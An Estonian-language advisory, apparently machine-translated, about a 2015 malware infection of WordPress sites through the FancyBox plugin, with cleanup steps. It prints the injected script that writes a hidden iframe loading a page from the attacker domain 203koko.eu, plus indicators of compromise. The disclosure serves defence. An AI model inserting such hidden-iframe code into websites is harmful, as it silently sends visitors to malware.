Varem sel nädalal mitmeid veebisaite ja blogisid WordPress, said kasutajalt hoiatused nakatunud pahavara läbi Google Webmaster.
Probleem, et Google Webmaster osutatud on kohalolekul kood / käsikiri iframe pahavara allikas veebilehele.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Tundub, et see on haavatavus a pluginacquis FancyBox jaoks WordPress mis alles eile (05.02.2015) ei ole uuendatud juba pikka aega.
Selle probleemi lahendamine ja desinfitseerida ohustatud alade see pahavara on suhteliselt lihtne.
1. Keelake FancyBoxi pistikprogramm.
2. Kustuta kõik FancyBoxi pluginafailid serverist (FTP kaudu)
3. Installige pistikprogrammi uus versioon (Fancybox 3.0.4)
FancyBox jaoks WordPress 3.0.4
- Nimetas ümber sätte, mida mõjutas versioonis 3.0.3 mainitud turbeprobleem. See peaks peatama pahatahtliku koodi ilmumise saitidel, kus pistikprogramm asub updated ilma pahatahtlikku koodi eemaldamata.
FancyBox jaoks WordPress 3.0.3
- Fikseeritud julgeoleku küsimus.
Malware Info:
TÜÜP: iframe ümbersuunamine
TARGET: WordPress fancybox
RÜNDEVARA Domeen: 203koko.eu
RÜNDEVARA URI: http://203koko.eu/hjnfh/ipframe2.php
VARA RAW KOODID:
KIRJUTATUD TARVIKUD: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Eemaldage oma arvutist pahavara WordPress veebisait.
